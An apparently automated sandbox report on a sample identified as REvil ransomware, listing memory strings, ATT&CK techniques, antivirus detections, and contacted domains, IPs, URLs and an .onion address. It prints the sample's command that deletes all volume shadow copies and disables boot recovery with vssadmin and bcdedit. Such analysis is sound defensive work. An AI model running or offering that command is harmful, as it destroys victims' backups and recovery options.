            Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\f\:u
            Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\f\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\
            Source: C:\Users\user\Desktop\myfile.exeAPI call chain: ExitProcess graph end nodegraph_0-3594
            Source: C:\Users\user\Desktop\myfile.exeAPI call chain: ExitProcess graph end nodegraph_0-3585
            Source: C:\Users\user\Desktop\myfile.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274AAB rdtsc 0_2_00274AAB
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_0027464B mov ecx, dword ptr fs:[00000030h]0_2_0027464B
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002742E5 mov eax, dword ptr fs:[00000030h]0_2_002742E5
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00273C1E HeapCreate,GetProcessHeap,0_2_00273C1E
            Source: C:\Users\user\Desktop\myfile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00273DEE cpuid 0_2_00273DEE
            Source: C:\Users\user\Desktop\myfile.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_0027438B GetUserNameW,0_2_0027438B
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media
            12
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            OS Credential Dumping11
            Peripheral Device Discovery
            Remote Services1
            Archive Collected Data
            1
            Data Obfuscation
            Exfiltration Over Other Network Medium2
            Data Encrypted for Impact
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            11
            File Deletion
            LSASS Memory1
            Account Discovery
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over Bluetooth1
            Inhibit System Recovery
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Masquerading
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive21
            Encrypted Channel
            Automated Exfiltration1
            Defacement
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Virtualization/Sandbox Evasion
            NTDS24
            System Information Discovery
            Distributed Component Object ModelInput Capture4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets121
            Security Software Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture1
            Proxy
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            myfile.exe91%VirustotalBrowse
            myfile.exe97%ReversingLabsWin32.Ransomware.REvil
            myfile.exe100%AviraTR/Crypt.XPACK.Gen
            myfile.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            pansionatblago.ru3%VirustotalBrowse
            parksideseniorliving.net4%VirustotalBrowse
            www.altitudetrampolinepark.com0%VirustotalBrowse
            innervisions-id.com2%VirustotalBrowse
            chainofhopeeurope.eu2%VirustotalBrowse
            maxcube24.com.ua6%VirustotalBrowse
            www.mieleshopping.it0%VirustotalBrowse
            hostaletdelsindians.es3%VirustotalBrowse
            bayshoreelite.com1%VirustotalBrowse
            lexced.com1%VirustotalBrowse
            relevantonline.eu3%VirustotalBrowse
            abulanov.com2%VirustotalBrowse
            testitjavertailut.net2%VirustotalBrowse
            lb.wordpress.com0%VirustotalBrowse
            magrinya.net2%VirustotalBrowse
            stanleyqualitysystems.com5%VirustotalBrowse
            holocine.de5%VirustotalBrowse
            oscommunity.de2%VirustotalBrowse
            georgemuncey.com1%VirustotalBrowse
            nbva.co.uk4%VirustotalBrowse
            skoczynski.eu3%VirustotalBrowse
            rsidesigns.com2%VirustotalBrowse
            business-basic.de1%VirustotalBrowse
            altitudeboise.com4%VirustotalBrowse
            mieleshopping.it1%VirustotalBrowse
            lashandbrowenvy.com1%VirustotalBrowse
            m2graph.fr2%VirustotalBrowse
            altitudetrampolinepark.com0%VirustotalBrowse
            vitoriaecoturismo.com.br2%VirustotalBrowse
            bundan.com1%VirustotalBrowse
            c-sprop.com1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://schema.org0%URL Reputationsafe
            https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa30%Avira URL Cloudsafe
            https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource00%Avira URL Cloudsafe
            https://princebet88.site/assets/images/banner-princebet88.webp0%Avira URL Cloudsafe
            https://90nguyentuan.com/0%Avira URL Cloudsafe
            https://tailwindcss.com0%Avira URL Cloudsafe
            https://www.bundan.com/xmlrpc.php0%Avira URL Cloudsafe
            https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteion0%Avira URL Cloudsafe
            https://karnesstanleyhvac.com/w0%Avira URL Cloudsafe
            https://90nguyentuan.com/2%VirustotalBrowse
            https://tailwindcss.com0%VirustotalBrowse
            https://m2graph.fr/m0%Avira URL Cloudsafe
            https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifage0%Avira URL Cloudsafe
            https://parksideseniorliving.net/wp-json/0%Avira URL Cloudsafe
            http://stayblue.basecom.eu0%Avira URL Cloudsafe
            https://github.com/sindresorhus/modern-normalize0%Avira URL Cloudsafe
            https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.png0%Avira URL Cloudsafe
            https://m2graph.fr/S0%Avira URL Cloudsafe
            http://stayblue.basecom.eu0%VirustotalBrowse
            http://m2graph.fr0%Avira URL Cloudsafe
            https://github.com/sindresorhus/modern-normalize0%VirustotalBrowse
            https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa30%VirustotalBrowse
            https://www.lexced.com/9E0%Avira URL Cloudsafe
            https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:0%Avira URL Cloudsafe
            https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg100%Avira URL Cloudmalware
            https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.png0%Avira URL Cloudsafe
            https://s3.amazonaws.com/a.storyblok.com/f/200%Avira URL Cloudsafe
            http://m2graph.fr2%VirustotalBrowse
            https://karnesstanleyhvac.com/content/images/gv.pngpng0%Avira URL Cloudsafe
            https://www.bundan.com/wp-json/0%Avira URL Cloudsafe
            https://almamidwifery.com/0%Avira URL Cloudsafe
            https://magrinya.net/static/temp/mdjsvnauuvkc.jpg0%Avira URL Cloudsafe
            https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.png0%Avira URL Cloudsafe
            https://almamidwifery.com/1%VirustotalBrowse
            https://princebet88.site/0%Avira URL Cloudsafe
            https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpg0%Avira URL Cloudsafe
            https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpg0%Avira URL Cloudsafe
            https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=0%Avira URL Cloudsafe
            https://www.almamidwifery.com/~0%Avira URL Cloudsafe
            https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg100%Avira URL Cloudmalware
            https://testitjavertailut.net/0%Avira URL Cloudsafe
            https://princebet88.site/0%VirustotalBrowse
            https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.ico0%Avira URL Cloudsafe
            https://innervisions-id.com/png0%Avira URL Cloudsafe
            https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=0%VirustotalBrowse
            https://amelielecompte.wordpress.com/00%Avira URL Cloudsafe
            http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC0100610%Avira URL Cloudsafe
            https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage100%Avira URL Cloudmalware
            https://innervisions-id.com/wp-content/images/kpgkqb.jpgq0%Avira URL Cloudsafe
            https://vitoriaecoturismo.com.br/0%Avira URL Cloudsafe
            https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife00%Avira URL Cloudsafe
            https://innervisions-id.com/wp-content/images/kpgkqb.jpgw0%Avira URL Cloudsafe
            https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692b0%Avira URL Cloudsafe
            https://testitjavertailut.net/2%VirustotalBrowse
            https://princebet88.site/assets/images/logo-princebet88.webp0%Avira URL Cloudsafe
            https://chomiksy.net/png0%Avira URL Cloudsafe
            https://innervisions-id.com/wp-content/images/kpgkqb.jpgr0%Avira URL Cloudsafe
            https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpg0%Avira URL Cloudsafe
            http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24B0%Avira URL Cloudsafe
            https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.png0%Avira URL Cloudsafe
            https://pansionatblago.ru/t$~0%Avira URL Cloudsafe
            https://amelielecompte.wordpress.com/Q0%Avira URL Cloudsafe
            https://amelielecompte.wordpress.com/O0%Avira URL Cloudsafe
            https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0100%Avira URL Cloudmalware
            https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpg0%Avira URL Cloudsafe
            https://bayshoreelite.com/data/game/mfkyhvlfokmitv.png0%Avira URL Cloudsafe
            http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0%Avira URL Cloudsafe
            https://vitoriaecoturismo.com.br/2%VirustotalBrowse
            https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692b0%Avira URL Cloudsafe
            https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9100%Avira URL Cloudmalware
            https://avisioninthedesert.com/0%Avira URL Cloudsafe
            https://www.bundan.com/0%Avira URL Cloudsafe
            https://nbva.co.uk/wp-json/0%Avira URL Cloudsafe
            https://rsidesigns.com/wp-content/assets/iybw.jpg0%Avira URL Cloudsafe
            https://www.almamidwifery.com/content/assets/jlbaveucagau.png0%Avira URL Cloudsafe
            https://princebet88.site/amp/0%Avira URL Cloudsafe
            https://bayshoreelite.com/feed/0%Avira URL Cloudsafe
            https://almamidwifery.com/content/assets/jlbaveucagau.png0%Avira URL Cloudsafe
            https://parksideseniorliving.net/#/schema/logo/image/0%Avira URL Cloudsafe
            https://yoast.com/wordpress/plugins/seo/0%Avira URL Cloudsafe
            https://chainofhopeeurope.eu/?0%Avira URL Cloudsafe
            https://lexced.com/0%Avira URL Cloudsafe
            https://avisioninthedesert.com/wp-content/graphic/lgul.jpg0%Avira URL Cloudsafe
            https://mursall.de/comments/feed/0%Avira URL Cloudsafe
            https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.png0%Avira URL Cloudsafe
            https://mieleshopping.it/wp-content/game/doiathwnvkwf.gif0%Avira URL Cloudsafe
            https://karnesstanleyhvac.com/content/images/gv.png0%Avira URL Cloudsafe
            https://holocine.de/data/assets/hxdtlt.gif0%Avira URL Cloudsafe
            https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpg0%Avira URL Cloudsafe
            https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692b0%Avira URL Cloudsafe
            https://altitudetrampolinepark.com/0%Avira URL Cloudsafe
            https://pansionatblago.ru/0%Avira URL Cloudsafe
            https://kenmccallum.com/uploads/pictures/gcgicdxmun.gif0%Avira URL Cloudsafe
            http://m2graph.fr/F0%Avira URL Cloudsafe
            https://chomiksy.net/0%Avira URL Cloudsafe
            https://ikadomus.com/news/tmp/zrxchmwcslab.gif0%Avira URL Cloudsafe
            https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrces0%Avira URL Cloudsafe
            https://www.lexced.com/static/tmp/vd.gifLMEMH0%Avira URL Cloudsafe
            https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHk0%Avira URL Cloudsafe
            https://parksideseniorliving.net/admin/temp/eghuey.png0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            parksideseniorliving.net
            35.215.83.253
            truetrueunknown
            pansionatblago.ru
            89.108.65.79
            truetrueunknown
            www.altitudetrampolinepark.com
            104.26.0.120
            truefalseunknown
            innervisions-id.com
            95.215.226.251
            truetrueunknown
            chainofhopeeurope.eu
            51.15.159.75
            truetrueunknown
            maxcube24.com.ua
            185.68.16.21
            truetrueunknown
            www.mieleshopping.it
            35.214.166.193
            truefalseunknown
            princebet88.site
            172.67.158.62
            truefalse
              unknown
              hostaletdelsindians.es
              185.15.78.186
              truetrueunknown
              karnesstanleyhvac.com
              208.73.140.70
              truefalse
                unknown
                bayshoreelite.com
                160.153.0.174
                truetrueunknown
                lexced.com
                87.118.122.41
                truetrueunknown
                testitjavertailut.net
                188.114.96.3
                truetrueunknown
                relevantonline.eu
                85.10.140.71
                truetrueunknown
                abulanov.com
                188.246.227.29
                truetrueunknown
                lb.wordpress.com
                192.0.78.13
                truefalseunknown
                magrinya.net
                217.160.0.18
                truetrueunknown
                stanleyqualitysystems.com
                208.73.140.70
                truetrueunknown
                holocine.de
                109.237.132.56
                truetrueunknown
                oscommunity.de
                80.158.2.41
                truetrueunknown
                georgemuncey.com
                52.215.137.200
                truetrueunknown
                nbva.co.uk
                85.92.72.56
                truetrueunknown
                skoczynski.eu
                46.242.240.159
                truetrueunknown
                rsidesigns.com
                185.58.213.84
                truetrueunknown
                business-basic.de
                188.40.30.106
                truetrueunknown
                altitudeboise.com
                188.114.97.3
                truetrueunknown
                mieleshopping.it
                35.214.166.193
                truetrueunknown
                lashandbrowenvy.com
                160.153.0.131
                truetrueunknown
                m2graph.fr
                89.116.147.189
                truetrueunknown
                altitudetrampolinepark.com
                172.67.71.217
                truefalseunknown
                vitoriaecoturismo.com.br
                134.209.129.254
                truetrueunknown
                c-sprop.com
                23.236.62.147
                truefalseunknown
                bundan.com
                35.214.211.239
                truetrueunknown
                afbudsrejserallinclusive.dk
                138.201.61.68
                truetrue
                  unknown
                  almamidwifery.com
                  198.185.159.145
                  truetrue
                    unknown
                    kenmccallum.com
                    188.114.96.3
                    truetrue
                      unknown
                      stage-infirmier.fr
                      141.95.251.157
                      truetrue
                        unknown
                        ext-sq.squarespace.com
                        198.185.159.144
                        truefalse
                          unknown
                          mursall.de
                          95.130.22.108
                          truetrue
                            unknown
                            satoblog.org
                            unknown
                            unknowntrue
                              unknown
                              activeterroristwarningcompany.com
                              unknown
                              unknowntrue
                                unknown
                                chomiksy.net
                                unknown
                                unknowntrue
                                  unknown
                                  www.almamidwifery.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.lexced.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      amelielecompte.wordpress.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.hostaletdelsindians.es
                                        unknown
                                        unknowntrue
                                          unknown
                                          davedavisphotos.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            wribrazil.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              funworx.de
                                              unknown
                                              unknowntrue
                                                unknown
                                                bd2fly.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.georgemuncey.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    avisioninthedesert.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      90nguyentuan.com
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        baikalflot.ru
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          ikadomus.com
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            enactusnhlstenden.com
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              NameMaliciousAntivirus DetectionReputation
                                                              https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://magrinya.net/static/temp/mdjsvnauuvkc.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://princebet88.site/false
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://bayshoreelite.com/data/game/mfkyhvlfokmitv.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://rsidesigns.com/wp-content/assets/iybw.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.almamidwifery.com/content/assets/jlbaveucagau.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://almamidwifery.com/content/assets/jlbaveucagau.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mieleshopping.it/wp-content/game/doiathwnvkwf.giffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://karnesstanleyhvac.com/content/images/gv.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://holocine.de/data/assets/hxdtlt.giffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://altitudetrampolinepark.com/false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://kenmccallum.com/uploads/pictures/gcgicdxmun.giffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://parksideseniorliving.net/admin/temp/eghuey.pngfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.giffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://stage-infirmier.fr/news/pictures/numjznnuau.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://princebet88.site/assets/images/banner-princebet88.webpmyfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589328177.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895325965.0000000004360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://tailwindcss.commyfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://90nguyentuan.com/myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 2%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource0myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteionmyfile.exe, 00000000.00000002.2894114349.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.bundan.com/xmlrpc.phpmyfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://karnesstanleyhvac.com/wmyfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://m2graph.fr/mmyfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifagemyfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://parksideseniorliving.net/wp-json/myfile.exe, 00000000.00000003.2354706141.0000000001090000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://stayblue.basecom.eumyfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/sindresorhus/modern-normalizemyfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://m2graph.fr/Smyfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://m2graph.frmyfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • 2%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.lexced.com/9Emyfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.pngmyfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
